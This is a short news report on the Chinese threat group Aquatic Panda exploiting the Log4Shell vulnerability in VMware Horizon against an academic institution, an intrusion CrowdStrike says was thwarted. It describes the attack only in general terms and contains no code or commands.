A sophisticated cyber intrusion attributed to a China-based threat group, identified as Aquatic Panda, has been detected leveraging severe vulnerabilities in the Apache Log4j logging system. This attack vector enabled the adversaries to execute various post-exploitation activities, including reconnaissance operations and credential harvesting from their targets.
The cybersecurity firm CrowdStrike reported that this attempted breach, which has since been thwarted, specifically targeted a large, unnamed academic institution. Evidence suggests that Aquatic Panda has been operational since mid-2020, focusing on intelligence gathering and industrial espionage, predominantly against entities in telecommunications, technology, and governmental sectors.
The breach exploited the Log4Shell vulnerability (CVE-2021-44228, CVSS score: 10.0), allowing attackers to compromise a vulnerable instance of VMware Horizon, a desktop and application virtualization solution. Following this initial access, the attackers executed a series of malicious commands aimed at downloading payloads hosted on external servers.
According to researchers, a modified iteration of the Log4j exploit was likely employed during these activities, referencing an exploit made publicly available on GitHub shortly after its disclosure in December 2021. Aquatic Panda’s intrusive actions extended beyond simple reconnaissance. The group made efforts to disable third-party endpoint detection and response tools before attempting to deploy malware capable of establishing a reverse shell and harvesting user credentials.
The swift incident response by the targeted academic institution, which involved promptly activating their response protocols and ultimately patching the vulnerable application, was critical in thwarting further exploit attempts. However, the precise goals and intentions of Aquatic Panda remain unclear despite the disruption of their efforts.
